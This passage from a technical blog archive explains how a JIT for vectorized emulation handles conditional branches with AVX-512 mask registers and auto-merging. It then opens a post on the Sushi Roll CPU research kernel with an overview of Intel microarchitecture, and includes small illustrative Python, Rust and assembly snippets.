<p>On the Knights Landing Xeon Phi (the CPU I develop vectorized emulation for), there is a huge bottleneck on the front-end and instruction decode. This means that loading a constant into a vector register by loading it into a GPR (<code class="language-plaintext highlighter-rouge">mov</code>), moving it into the lowest-order lane of a vector (<code class="language-plaintext highlighter-rouge">vmovq</code>), and then broadcasting it (<code class="language-plaintext highlighter-rouge">vpbroadcastq</code>) is actually a lot more expensive than just loading that value from memory.</p>
<p>To enable this, we need a database which just holds constants. During the JIT, constants are allocated from this table (just appending to a list, while deduping shared constants). This table is then pointed to by <code class="language-plaintext highlighter-rouge">r11</code> during JIT. During the JIT we can load a constant into all active lanes of a VM by doing a single <code class="language-plaintext highlighter-rouge">vpbroadcastq zmm, kmask, qword [r11+OFFSET]</code> instruction.</p>
<p>While this might not be ideal for normal Xeon processors, this is actually something that I have benchmarked, and on the Xeon Phi, it’s much faster to use the constant storage database.</p>
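<p>The table itself is dead simple. A sketch of the allocation logic (names are mine, not from the JIT) might look like:</p>

```python
class ConstPool:
    """Deduplicating quadword constant table. The JIT would point r11 at
    `consts` and emit `vpbroadcastq zmm, k1, qword [r11 + offset]`."""
    def __init__(self):
        self.consts = []     # the flat quadword table pointed to by r11
        self.lookup = {}     # value -> byte offset, for dedup

    def offset_of(self, value):
        # Append new constants; reuse the existing slot for repeats
        if value not in self.lookup:
            self.lookup[value] = len(self.consts) * 8
            self.consts.append(value)
        return self.lookup[value]

pool = ConstPool()
print(pool.offset_of(5))      # → 0
print(pool.offset_of(1337))   # → 8
print(pool.offset_of(5))      # → 0 (deduped, same slot as before)
```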
<h3 id="target-registers">Target registers</h3>
<p>At the end of the day we’re emulating some other architecture. We hold all target architecture registers in memory pointed to by <code class="language-plaintext highlighter-rouge">r12</code>. It’s that simple. Most of the time we hold these in IL registers and thus aren’t incurring the cost of accessing memory.</p>
<h3 id="gpr-summary">GPR summary</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>r11 - Points to constant storage database (big vector of quadword constants)
r12 - Points to target architecture registers
</code></pre></div></div>
<hr />
<h1 id="phew">Phew</h1>
<p>Okay, now we know what register states look like when executing in JIT!</p>
<hr />
<h1 id="conditional-branches">Conditional branches</h1>
<p>Now we can get to the meat of this mini-blog! How conditional branches work using auto-merging! We’re going to go through instruction-by-instruction from the JIT graph we showed above.</p>
<p>Here’s the specific code in question for a conditional branch:</p>
<p><img src="/assets/falkil_condbranch_jit.png" alt="Conditional Branch" /></p>
<p>Well that looks awfully complex… but it’s really not. It’s quite magical!</p>
<h2 id="the-comparison">The comparison</h2>
<p><img src="/assets/cbranch_jit_inst1.png" alt="comparison" /></p>
<p>First, the comparison is performed on all lanes. Remember, ZMM registers hold 8 separate 64-bit values. We perform a 64-bit unsigned comparison on all 8 components, and store the results into <code class="language-plaintext highlighter-rouge">k2</code>. This means that <code class="language-plaintext highlighter-rouge">k2</code> will hold a bitmask with the “true” results set to 1, and the “false” results set to 0. We also use a kmask <code class="language-plaintext highlighter-rouge">k1</code> here, which means we only perform the comparison on VMs which are currently active. As a result of this instruction, <code class="language-plaintext highlighter-rouge">k2</code> has the corresponding bits set to 1 for VMs which were actively executing at the time, and also resulted in a “true” value from their comparisons.</p>
<p>In this case the <code class="language-plaintext highlighter-rouge">0x1</code> immediate to the <code class="language-plaintext highlighter-rouge">vpcmpuq</code> instruction indicates that this is a “less than” comparison.</p>
<h4 id="vpcmpqvpcmpuq-immediate"><code class="language-plaintext highlighter-rouge">vpcmpq/vpcmpuq</code> immediate</h4>
<p>Note that the immediate value provided to <code class="language-plaintext highlighter-rouge">vpcmpq</code> and the unsigned variant <code class="language-plaintext highlighter-rouge">vpcmpuq</code> determines the type of the comparison:</p>
<p><img src="/assets/vpcmpq_imm.png" alt="cmpimm" /></p>
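<p>Modeling the masked comparison in Python (my sketch), with immediate <code class="language-plaintext highlighter-rouge">0x1</code> meaning unsigned less-than:</p>

```python
MASK64 = (1 << 64) - 1

def vpcmpuq_lt(a, b, k1):
    """`vpcmpuq k2 {k1}, zmm_a, zmm_b, 1`: unsigned less-than per lane,
    but only for VMs whose bit in the online mask k1 is set."""
    k2 = 0
    for i in range(8):
        if (k1 >> i) & 1 and (a[i] & MASK64) < (b[i] & MASK64):
            k2 |= 1 << i
    return k2

a  = [0, 5, 9, 2, 7, 1, 3, 8]
b  = [4] * 8
k1 = 0b11110111                   # VM #3 is offline
print(bin(vpcmpuq_lt(a, b, k1)))  # → 0b1100001 (lane 3 is < 4, but masked off)
```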
<h2 id="the-comparison-inversion">The comparison inversion</h2>
<p><img src="/assets/cbranch_jit_inst2.png" alt="comparison inversion" /></p>
<p>Next, we invert the comparison operation to get the bits set for active VMs which want to go to the “false” path. This instruction is pretty neat.</p>
<p><code class="language-plaintext highlighter-rouge">kandnw</code> performs a bitwise negation of the second operand, and then ands with the third operand. This then is stored into the first operand. Since we have <code class="language-plaintext highlighter-rouge">k2</code> as the second operand (the result of the comparison) this gets negated. This then gets anded with <code class="language-plaintext highlighter-rouge">k1</code> (the third operand) to mask off VMs which are not actively executing. The result is that <code class="language-plaintext highlighter-rouge">k3</code> now contains the inverted result from the comparison, but we keep “offline” VMs still masked off.</p>
<p>In C/C++ this is simply: <code class="language-plaintext highlighter-rouge">k3 = (~k2) & k1</code></p>
<h2 id="the-branch-target-vector">The branch target vector</h2>
<p><img src="/assets/cbranch_jit_inst34.png" alt="branch targets" /></p>
<p>Now we start constructing <code class="language-plaintext highlighter-rouge">zmm0</code>… this is going to hold the “labels” for the targets each active lane wants to go to. Think of these “labels” as just a unique identifier for the target block they are branching to. In this case we use the constant storage database (pointed to by <code class="language-plaintext highlighter-rouge">r11</code>) to load up the target labels. We first load the “true target” labels into <code class="language-plaintext highlighter-rouge">zmm0</code> by using the <code class="language-plaintext highlighter-rouge">k2</code> kmask, the “true” kmask. After this, we merge the “false target” labels into <code class="language-plaintext highlighter-rouge">zmm0</code> using <code class="language-plaintext highlighter-rouge">k3</code>, the “false/inverted” kmask.</p>
<p>After these 2 instructions execute, <code class="language-plaintext highlighter-rouge">zmm0</code> now holds the target “labels” based on their corresponding comparison results. <code class="language-plaintext highlighter-rouge">zmm0</code> now tells us where the currently executing VMs “want to” branch to.</p>
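<p>The two merge-masked broadcasts can be modeled like this (a sketch; the block labels are made-up values):</p>

```python
def broadcast_merge(dst, value, kmask):
    """`vpbroadcastq zmm0 {k}, qword [r11+off]`: write `value` only into
    lanes whose kmask bit is set; other lanes keep their old contents."""
    return [value if (kmask >> i) & 1 else dst[i] for i in range(8)]

TRUE_LBL, FALSE_LBL = 0xAA, 0xBB   # hypothetical block labels
k2 = 0b00000101                    # online VMs that compared true
k3 = 0b00001010                    # online VMs that compared false

zmm0 = [0] * 8
zmm0 = broadcast_merge(zmm0, TRUE_LBL,  k2)   # true targets first
zmm0 = broadcast_merge(zmm0, FALSE_LBL, k3)   # then merge false targets
print(zmm0)   # → [170, 187, 170, 187, 0, 0, 0, 0]
```

<p>Every online lane now holds the label of the block its VM wants to branch to.</p>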
<h2 id="the-merge-into-master">The merge into master</h2>
<p><img src="/assets/cbranch_jit_inst5.png" alt="merge into master" /></p>
<p>Now we merge the target branches for the active VMs which were just computed (<code class="language-plaintext highlighter-rouge">zmm0</code>), into the master target register (<code class="language-plaintext highlighter-rouge">zmm31</code>). Since VMs can be disabled via divergence, <code class="language-plaintext highlighter-rouge">zmm31</code> holds the “master” copy of where all VMs want to go (including ones which have been masked off and are “waiting” to execute a certain target).</p>
<p><code class="language-plaintext highlighter-rouge">zmm31</code> now holds the target labels for every single lane with the updated results of this comparison!</p>
<h2 id="broadcasting-the-target">Broadcasting the target</h2>
<p><img src="/assets/cbranch_jit_inst6.png" alt="broadcasting the target" /></p>
<p>Now that we have <code class="language-plaintext highlighter-rouge">zmm31</code> containing all of the branch targets, we now have to pick the one we are going to follow. To do this, we want a vector which contains the broadcasted target label of the VM we are following. As mentioned in the JIT calling convention section, <code class="language-plaintext highlighter-rouge">zmm30</code> contains the index of the VM we are following in all 8 lanes.</p>
<h4 id="example">Example</h4>
<p>Let’s say for example we are following VM #4 (zero-indexed).</p>
<p><code class="language-plaintext highlighter-rouge">zmm30</code> contains <code class="language-plaintext highlighter-rouge">[4, 4, 4, 4, 4, 4, 4, 4]</code></p>
<p><code class="language-plaintext highlighter-rouge">zmm31</code> contains <code class="language-plaintext highlighter-rouge">[block_0, block_0, block_1, block_1, block_2, block_2, block_2, block_2]</code></p>
<p>After the <code class="language-plaintext highlighter-rouge">vpermq</code> instruction we now have <code class="language-plaintext highlighter-rouge">zmm1</code> containing <code class="language-plaintext highlighter-rouge">[block_2, block_2, block_2, block_2, block_2, block_2, block_2, block_2]</code>.</p>
<p>Effectively, <code class="language-plaintext highlighter-rouge">zmm1</code> will contain the block label for the target that the VM we are following is going to go to. This is ultimately the block we will be jumping to!</p>
<h2 id="auto-merging">Auto-merging</h2>
<p><img src="/assets/cbranch_jit_inst7.png" alt="auto-merging" /></p>
<p>This is where the magic happens. <code class="language-plaintext highlighter-rouge">zmm31</code> contains where all the VMs “want to execute”, and <code class="language-plaintext highlighter-rouge">zmm1</code> from the above instruction contains where we are actually going to execute. Thus, we compute a new <code class="language-plaintext highlighter-rouge">k1</code> (active VM kmask) based on equality between <code class="language-plaintext highlighter-rouge">zmm31</code> and <code class="language-plaintext highlighter-rouge">zmm1</code>.</p>
<p>Or in more simple terms… if a VM that was previously disabled was waiting to execute the block we’re about to go execute… bring it back online!</p>
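<p>In Python terms (my sketch), the auto-merge is just a lane-wise equality producing the new online mask:</p>

```python
def auto_merge(zmm31, zmm1):
    """`vpcmpeqq`-style merge: a VM is online iff the block it wants to
    execute equals the block we are actually about to execute."""
    k1 = 0
    for i in range(8):
        if zmm31[i] == zmm1[i]:
            k1 |= 1 << i
    return k1

zmm31 = [2, 1, 2, 3, 2, 1, 2, 2]     # where each VM wants to go
zmm1  = [2] * 8                      # where the followed VM is going
print(bin(auto_merge(zmm31, zmm1)))  # → 0b11010101
```

<p>VMs 0, 2, 4, 6, and 7 all want block 2, so they run together; VMs 1, 3, and 5 stay parked until we reach their targets.</p>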
<h2 id="doin-the-branch">Doin’ the branch</h2>
<p><img src="/assets/cbranch_jit_inst8.png" alt="branching" /></p>
<p>Now we’re at the end. <code class="language-plaintext highlighter-rouge">k2</code> still holds the true targets. We and this with <code class="language-plaintext highlighter-rouge">k7</code> (the “following” VM mask) to figure out if the VM we are following is going to take the branch or not.</p>
<p>We then need to make this result “actionable” by getting it into the <code class="language-plaintext highlighter-rouge">eflags</code> x86 register such that we can conditionally branch. This is done with a simple <code class="language-plaintext highlighter-rouge">kortestw</code> instruction of <code class="language-plaintext highlighter-rouge">k2</code> with itself. This will cause the zero flag to get set in <code class="language-plaintext highlighter-rouge">eflags</code> if <code class="language-plaintext highlighter-rouge">k2</code> is equal to zero.</p>
<p>Once this is done, we can do a <code class="language-plaintext highlighter-rouge">jnz</code> instruction (same as <code class="language-plaintext highlighter-rouge">jne</code>), causing us to jump to the true target path if the <code class="language-plaintext highlighter-rouge">k2</code> value is non-zero (if the VM we’re following is taking the true path). Otherwise we fall through to the “false” path (or potentially branch to it if it’s not directly following this block).</p>
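<p>The final decision boils down to a single bit test, roughly (my sketch):</p>

```python
def take_true_path(k2, k7):
    """Roughly the `and`+`kortestw`+`jnz` sequence: branch to the true
    target iff the VM we are following is in the set that compared true."""
    return (k2 & k7) != 0

k7 = 0b00010000                          # following VM #4
print(take_true_path(0b00110100, k7))    # → True  (VM #4 compared true)
print(take_true_path(0b00100011, k7))    # → False (VM #4 compared false)
```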
<hr />
<h1 id="update">Update</h1>
<p>After a little nap, I realized that I could save 2 instructions during the conditional branch. I knew something was a little off as I’ve written similar code before and I never needed an inverse mask.</p>
<p><img src="/assets/cbranch_jit_updated.png" alt="updated JIT" /></p>
<p>Here we’ll note that we removed 2 instructions. We no longer compute the inverse mask. Instead, we initially store the false target block labels into <code class="language-plaintext highlighter-rouge">zmm31</code> using the online mask (<code class="language-plaintext highlighter-rouge">k1</code>). This temporarily marks that “all online VMs want to take the false target”. Then, using the <code class="language-plaintext highlighter-rouge">k2</code> mask (true targets), we merge the true target block labels over <code class="language-plaintext highlighter-rouge">zmm31</code>.</p>
<p>Simple! We remove the inverse mask computation (<code class="language-plaintext highlighter-rouge">kandnw</code>) and the <code class="language-plaintext highlighter-rouge">zmm0</code> temporary, merging directly into <code class="language-plaintext highlighter-rouge">zmm31</code>. But the effect is exactly the same as the previous version.</p>
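<p>It’s easy to convince yourself the two versions are equivalent with a little model (my sketch, using made-up labels):</p>

```python
def branch_targets_v1(zmm31, true_lbl, false_lbl, k1, k2):
    """Original: build zmm0 under k2 (true) and k3 = ~k2 & k1 (false),
    then merge zmm0 into zmm31 under the online mask k1."""
    k3 = (~k2) & k1 & 0xFF
    zmm0 = [0] * 8
    zmm0 = [true_lbl  if (k2 >> i) & 1 else zmm0[i] for i in range(8)]
    zmm0 = [false_lbl if (k3 >> i) & 1 else zmm0[i] for i in range(8)]
    return [zmm0[i] if (k1 >> i) & 1 else zmm31[i] for i in range(8)]

def branch_targets_v2(zmm31, true_lbl, false_lbl, k1, k2):
    """Updated: broadcast the false label under k1, then overwrite the
    true lanes under k2; no inverse mask, no zmm0 temporary."""
    out = [false_lbl if (k1 >> i) & 1 else zmm31[i] for i in range(8)]
    return [true_lbl if (k2 >> i) & 1 else out[i] for i in range(8)]

args = ([9] * 8, 0xAA, 0xBB, 0b00111100, 0b00010100)
print(branch_targets_v1(*args) == branch_targets_v2(*args))  # → True
```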
<p>Not quite sure why I thought the inverse mask was needed, but it goes to show that a little bit of rest goes a long way!</p>
<p>Due to instruction decode pressure on the Xeon Phi (2 instructions decoded per cycle), this change is a <em>minimum</em> 1 cycle improvement. Further, it’s a reduction of 8 bytes of code per conditional branch, which reduces L1i pressure. This is likely in the single digit percentages for overall JIT speedup, as conditional branches are <em>everywhere</em>!</p>
<hr />
<h1 id="fin">Fin</h1>
<p>And that’s it! That’s currently how I handle auto-merging during conditional branches in vectorized emulation as of today! This code is often changed and this is probably not its final form. There might be a simpler way to achieve this (fewer instructions, or lower latency instructions)… but progress always happens over time :)</p>
<p>It’s important to note that this auto-merging isn’t perfect, and <em>most</em> cases will result in VMs hanging, but this is an extremely low cost way to bring VMs online dynamically in even the tightest loops. More macro-scale merging can be done with smarter static-analysis and control flow decisions.</p>
<p>I hope this was a fun read! Let me know if you want more of these mini-blogs.</p>
<hr />
<h1 id="sushi-roll">Sushi Roll: A CPU research kernel with minimal noise for cycle-by-cycle micro-architectural introspection</h1>
<p><em>Published 2019-08-19, originally at <a href="https://gamozolabs.github.io/metrology/2019/08/19/sushi_roll">https://gamozolabs.github.io/metrology/2019/08/19/sushi_roll</a></em></p>
<h1 id="twitter">Twitter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!</p>
<h1 id="summary">Summary</h1>
<p>In this blog we’re going to go into details about a CPU research kernel I’ve developed: Sushi Roll. This kernel uses multiple creative techniques to measure undefined behavior on Intel micro-architectures. Sushi Roll is designed to have minimal noise such that tiny micro-architectural events can be measured, such as speculative execution and cache-coherency behavior. With creative use of performance counters we’re able to accurately plot micro-architectural activity on a graph with an x-axis in cycles.</p>
<p>We’ll go a lot more into detail about what everything in this graph means later in the blog, but here’s a simple example of just some of the data we can collect:</p>
<p><img src="/assets/example_profiling.png" alt="Example uarch activity" />
<em><sub>Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis</sub></em></p>
<h1 id="agenda">Agenda</h1>
<p>This is a relatively long blog and will be split into 4 major sections.</p>
<ul>
<li>The gears that turn in your CPU: A high-level explanation of modern Intel micro-architectures</li>
<li>Sushi Roll: The design of the low-noise research kernel</li>
<li>Cycle-by-cycle micro-architectural introspection: A unique usage of performance counters to observe cycle-by-cycle micro-architectural behaviors</li>
<li>Results: Putting the pieces together and making graphs of cool micro-architectural behavior</li>
</ul>
<h1 id="why">Why?</h1>
<p>In the past year I’ve spent a decent amount of time doing CPU vulnerability research. I’ve written proof-of-concept exploits for nearly every CPU vulnerability, from many attacker perspectives (user leaking kernel, user/kernel leaking hypervisor, guest leaking other guest, etc). These exploits allowed us to provide developers and researchers with real-world attacks to verify mitigations.</p>
<p>CPU research happens to be an overlap of my two primary research interests: vulnerability research and high-performance kernel development. I joined Microsoft in the early winter of 2017 and this lined up pretty closely with the public release of the Meltdown and Spectre CPU attacks. As I didn’t yet have much on my plate, the idea was floated that I could look into some of the CPU vulnerabilities. I got pretty lucky with this timing, as I ended up really enjoying the work and ended up sinking most of my free time into it.</p>
<p>My workflow for research often starts with writing some custom tools for measuring and analysis of a given target. Whether the target is a web browser, PDF parser, remote attack surface, or a CPU, I’ve often found that the best thing you can do is just make something new. Try out some new attack surface, write a targeted fuzzer for a specific feature, etc. Doing something new doesn’t have to be better or more difficult than something that was done before, as often there are completely unexplored surfaces out there. My specialty is introspection. I find unique ways to measure behaviors, which then fuels the idea pool for code auditing or fuzzer development.</p>
<p>This leads to an interesting situation in CPU research… it’s largely blind. Much of current CPU research is done by writing snippets of code and reviewing their overall side-effects (via cache timing, performance counters, etc). These overall side-effects may also include noise from other processor activity, from the OS task switching processes, other cores changing the MESI-state of cache lines, etc. I happened to already have a low-noise no-shared-memory research kernel that I developed for vectorized emulation on Xeon Phis! This made for a really good starting point for throwing in some performance counters and measuring CPU behaviors… and the results were a bit better than expected.</p>
<p>TL;DR: I enjoy writing tools to measure things, so I wrote a tool to measure undefined CPU behavior.</p>
<hr />
<h1 id="the-gears-that-turn-in-your-cpu">The gears that turn in your CPU</h1>
<p><em>Feel free to skip this section entirely if you’re familiar with modern processor architecture</em></p>
<p>Your modern Intel CPU is a fairly complex beast when you care about every technical detail, but lets look at it from a higher level. Here’s what the micro-architecture (uArch) looks like in a modern Intel Skylake processor.</p>
<p><img src="/assets/skylake_server_block_diagram.svg" alt="Skylake diagram" />
<em><sub>Skylake uArch diagram, <a href="https://en.wikichip.org/w/images/e/ee/skylake_server_block_diagram.svg">Diagram from WikiChip</a></sub></em></p>
<p>There are 3 main components: The front end, which converts complex x86 instructions into groups of micro-operations. The execution engine, which executes the micro-operations. And the memory subsystem, which makes sure that the processor is able to get streams of instructions and data.</p>
<hr />
<h3 id="front-end">Front End</h3>
<p>The front end covers almost everything related to figuring out which micro-operations (uops) need to be dispatched to the execution engine in order to accomplish a task. The execution engine on a modern Intel processor does not directly execute x86 instructions, rather these instructions are converted to these micro-operations which are fixed in size and specific to the processor micro-architecture.</p>
<h4 id="instruction-fetch-and-cache">Instruction fetch and cache</h4>
<p>There’s a lot that happens prior to the actual execution of an instruction. First, the memory containing the instruction is read into the L1 instruction cache, ideally brought in from the L2 cache as to minimize delay. At this point the instruction is still a macro-op (a variable-length x86 instruction), which is quite a pain to work with. The processor still doesn’t know how large the instruction is, so during pre-decode the processor will do an initial length decode to determine the instruction boundaries.</p>
<p>At this point the instruction has been chopped up and is ready for the instruction queue!</p>
<h4 id="instruction-queue-and-macro-fusion">Instruction Queue and Macro Fusion</h4>
<p>Instructions that come in for execution might be quite simple, and could potentially be “fused” into a complex operation. This stage is not publicly documented, but we know that a very common fusion is combining compare instructions with conditional branches. This allows a common instruction pattern like:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">5</span>
<span class="nf">jne</span> <span class="nv">.offset</span>
</code></pre></div></div>
<p>To be combined into a single macro-op with the same semantics. This complex fused operation now only takes up one slot in many parts of the CPU pipeline, rather than two, freeing up resources for other operations.</p>
<h4 id="decode">Decode</h4>
<p>Instruction decode is where the x86 macro-ops get converted into micro-ops. These micro-ops vary heavily by uArch, and allow Intel to regularly change fundamentals in their processors without affecting backwards compatibility with the x86 architecture. There’s a lot of magic that happens in the decoder, but mostly what matters is that the variable-length macro-ops get converted into the fixed-length micro-ops. There are multiple ways that this conversion happens. Instructions might directly convert to uops, and this is the common path for most x86 instructions. However, some instructions, or even processor conditions, may cause something called microcode to get executed.</p>
<h4 id="microcode">Microcode</h4>
<p>Some instructions in x86 trigger microcode to be used. Microcode is effectively a tiny collection of uops which will be executed on certain conditions. Think of this like a C/C++ macro, where you can have a one-liner for something that expands to much more. When an operation does something that requires microcode, the microcode ROM is accessed and the uops it specifies are placed into the pipeline. These are often complex operations, like switching operating modes, reading/writing internal CPU registers, etc. This microcode ROM also gives Intel an opportunity to make changes to instruction behaviors entirely with a microcode patch.</p>
<h4 id="uop-cache">uop Cache</h4>
<p>There’s also a uop cache which allows previously decoded instructions to skip the entire pre-decode and decode process. Like standard memory caching, this provides a huge speedup and dramatically reduces bottlenecks in the front-end.</p>
<h4 id="allocation-queue">Allocation Queue</h4>
<p>The allocation queue is responsible for holding a bunch of uops which need to be executed. These are then fed to the execution engine when the execution engine has resources available to execute them.</p>
<hr />
<h3 id="execution-engine">Execution engine</h3>
<p>The execution engine does exactly what you would expect: it executes things. But at this stage your processor starts moving your instructions around to speed things up.</p>
<p><a href="/assets/graph_desc.png"><img src="/assets/graph_desc.png" /></a>
<em><sub>Things start to get a bit complex at this point, click for details!</sub></em></p>
<h4 id="renaming--allocating--retirement">Renaming / Allocating / Retirement</h4>
<p>Resources need to be allocated for certain operations. There are a lot more registers in the processor than the standard x86 registers. These registers are allocated out for temporary operations, and often mapped onto their corresponding x86 registers.</p>
<p>There are a lot of optimizations the CPU can do at this stage. It can eliminate register moves by aliasing registers (such that two x86 registers “point to” the same internal register). It can remove known zeroing instructions (like <code class="language-plaintext highlighter-rouge">xor</code> with self, or <code class="language-plaintext highlighter-rouge">and</code> with zero) from the pipeline, and just zero the registers directly. These optimizations are frequently improved each generation.</p>
<p>Finally, when instructions have completed successfully, they are retired. This retirement commits the internal micro-architectural state back out to the x86 architectural state. It’s also when memory operations become visible to other CPUs.</p>
<h4 id="re-ordering">Re-ordering</h4>
<p>uop re-ordering is important to modern CPU performance. Future instructions which do not depend on the current instruction can execute while the current one is still waiting on its results.</p>
<p>For example:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nb">rax</span><span class="p">]</span>
<span class="nf">add</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rcx</span>
</code></pre></div></div>
<p>In this short example we see that we perform a 64-bit load from the address in <code class="language-plaintext highlighter-rouge">rax</code> and store it back into <code class="language-plaintext highlighter-rouge">rax</code>. Memory operations can be quite expensive, ranging from 4 cycles for a L1 cache hit, to 250 cycles and beyond for an off-processor memory access.</p>
<p>The processor is able to realize that the <code class="language-plaintext highlighter-rouge">add rbx, rcx</code> instruction does not need to “wait” for the result of the load, and can send off the <code class="language-plaintext highlighter-rouge">add</code> uop for execution while waiting for the load to complete.</p>
<p>This is where things can start to get weird. The processor starts to perform operations in a different order than what you told it to. The processor then holds the results and makes sure they “appear” to other cores in the correct order, as x86 is a strongly-ordered architecture. Other architectures like ARM are typically weakly-ordered, and it’s up to the developer to insert fences in the instruction stream to tell the processor the specific order operations need to complete in. This ordering is not an issue on a single core, but it may affect the way another core observes the memory transactions you perform.</p>
<p>For example:</p>
<p>Core 0 executes the following:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span> <span class="p">[</span><span class="nv">shared_memory.pointer</span><span class="p">],</span> <span class="nb">rax</span> <span class="c1">; Store the pointer in `rax` to shared memory</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nv">shared_memory.owned</span><span class="p">],</span> <span class="mi">0</span> <span class="c1">; Mark that we no longer own the shared memory</span>
</code></pre></div></div>
<p>Core 1 executes the following:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">.try_again:</span>
<span class="nf">cmp</span> <span class="p">[</span><span class="nv">shared_memory.owned</span><span class="p">],</span> <span class="mi">0</span> <span class="c1">; Check if someone owns this memory</span>
<span class="nf">jne</span> <span class="nv">.try_again</span> <span class="c1">; Someone owns this memory, wait a bit longer</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">shared_memory.pointer</span><span class="p">]</span> <span class="c1">; Get the pointer</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nb">rax</span><span class="p">]</span> <span class="c1">; Read from the pointer</span>
</code></pre></div></div>
<p>On x86 this is safe, as all aligned loads and stores are atomic, and are committed in a way that they appear in-order to all other processors. On something like ARM the <code class="language-plaintext highlighter-rouge">owned</code> value could be written to prior to <code class="language-plaintext highlighter-rouge">pointer</code> being written, allowing core 1 to use a stale/invalid pointer.</p>
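<p>The assembly pattern above maps directly onto release/acquire semantics. As a quick sketch (names hypothetical, using Rust's portable atomics rather than raw stores), a version that is safe on both x86 and weakly-ordered architectures could look something like this:</p>

```rust
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use std::sync::Arc;
use std::thread;

/// Publish a value from one thread and read it from another, using
/// release/acquire ordering to get the guarantee x86 gives for free.
fn publish_and_read() -> u64 {
    let value = Arc::new(AtomicU64::new(0));
    let owned = Arc::new(AtomicBool::new(true));

    let producer = {
        let (value, owned) = (Arc::clone(&value), Arc::clone(&owned));
        thread::spawn(move || {
            // Store the data first...
            value.store(0x1337, Ordering::Relaxed);
            // ...then drop ownership. `Release` guarantees the data store
            // becomes visible before this flag store, emitting the needed
            // fences on weakly-ordered architectures like ARM.
            owned.store(false, Ordering::Release);
        })
    };

    // Spin until the producer releases the memory. `Acquire` pairs with
    // the `Release` above, so the data read below can never be stale.
    while owned.load(Ordering::Acquire) {
        std::hint::spin_loop();
    }
    let result = value.load(Ordering::Relaxed);
    producer.join().unwrap();
    result
}

fn main() {
    assert_eq!(publish_and_read(), 0x1337);
}
```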
<h4 id="execution-units">Execution Units</h4>
<p>Finally we got to an easy part: the execution units. This is the silicon that is responsible for actually performing maths, loads, and stores. The core has multiple copies of this hardware logic for some of the common operations, which allows the same operation to be performed in parallel on separate data. For example, an add can be performed on 4 different execution units.</p>
<p>For things like loads, there are 2 load ports (port 2 and port 3), this allows 2 independent loads to be executed per cycle. Stores on the other hand, only have one port (port 4), and thus the core can only perform one store per cycle.</p>
<hr />
<h3 id="memory-subsystem">Memory subsystem</h3>
<p>The memory subsystem on Intel is pretty complex, but we’re only going to go into the basics.</p>
<h4 id="caches">Caches</h4>
<p>Caches are critical to modern CPU performance. RAM latency is so high (150-250 cycles) that a CPU is largely unusable without a cache. For example, if a modern x86 processor at 2.2 GHz had all caches disabled, it would never be able to execute more than ~15 million instructions per second. That’s as slow as an Intel 80486 from 1991.</p>
<p>When working on my first hypervisor I actually disabled all caching by mistake, and Windows took multiple hours to boot. It’s pretty incredible how important caches are.</p>
<p>For x86 there are typically 3 levels of cache: a level 1 cache, which is extremely fast but small (~4 cycles of latency); a level 2 cache, which is larger but still fairly small (~14 cycles of latency); and finally the last-level-cache (LLC, typically the L3 cache), which is quite large but has a higher latency (~60 cycles).</p>
<p>The L1 and L2 caches are present in each core, however, the L3 cache is shared between multiple cores.</p>
<h4 id="translation-lookaside-buffers-tlbs">Translation Lookaside Buffers (TLBs)</h4>
<p>In modern CPUs, applications almost never interface with physical memory directly. Rather they go through address translation to convert virtual addresses to physical addresses. This allows contiguous virtual memory regions to map to fragmented physical memory. Performing this translation requires 4 memory accesses (on 64-bit 4-level paging), and is quite expensive. Thus the CPU caches recently translated addresses such that it can skip this translation process during memory operations.</p>
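<p>Each of those 4 memory accesses is a lookup indexed by a 9-bit slice of the virtual address. Purely as an illustration of where those indices come from (this does no actual translation), splitting a 64-bit virtual address into its 4-level paging components looks like:</p>

```rust
/// Split a 64-bit virtual address into its 4-level paging components:
/// four 9-bit table indices and a 12-bit page offset.
fn paging_indices(vaddr: u64) -> (u64, u64, u64, u64, u64) {
    let pml4 = (vaddr >> 39) & 0x1ff; // Page map level 4 index
    let pdpt = (vaddr >> 30) & 0x1ff; // Page directory pointer table index
    let pd   = (vaddr >> 21) & 0x1ff; // Page directory index
    let pt   = (vaddr >> 12) & 0x1ff; // Page table index
    let off  = vaddr & 0xfff;         // Offset into the 4 KiB page
    (pml4, pdpt, pd, pt, off)
}

fn main() {
    // A typical user-space address, chosen arbitrarily for illustration
    let (pml4, pdpt, pd, pt, off) = paging_indices(0x7fff_dead_beef);
    assert_eq!((pml4, pdpt, pd, pt, off), (255, 511, 245, 219, 0xeef));
}
```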
<p>It is up to the OS to tell the CPU when to flush these TLBs via an invalidate page, <code class="language-plaintext highlighter-rouge">invlpg</code> instruction. If the OS doesn’t correctly <code class="language-plaintext highlighter-rouge">invlpg</code> memory when mappings change, it’s possible to use stale translation information.</p>
<h4 id="line-fill-buffers">Line fill buffers</h4>
<p>While a load is pending, and not yet present in L1 cache, the data lives in a line fill buffer. The line fill buffers live between L2 cache and your L1 cache. When a memory access misses L1 cache, a line fill buffer entry is allocated, and once the load completes, the LFB is copied into the L1 cache and the LFB entry is discarded.</p>
<h4 id="store-buffer">Store buffer</h4>
<p>Store buffers are similar to line fill buffers. While waiting for resources to be available for a store to complete, it is placed into a store buffer. This allows for up to 56 stores (on Skylake) to be queued up, even if all other aspects of the memory subsystem are currently busy, or stores are not ready to be retired.</p>
<p>Further, loads which access memory will query the store buffers to potentially bypass the cache. If a read occurs on a recently stored location, the read could directly be filled from the store buffers. This is called store forwarding.</p>
<h4 id="load-buffers">Load buffers</h4>
<p>Similar to store buffers, load buffers are used for pending load uops. This sits between your execution units and L1 cache. This can hold up to 72 entries on Skylake.</p>
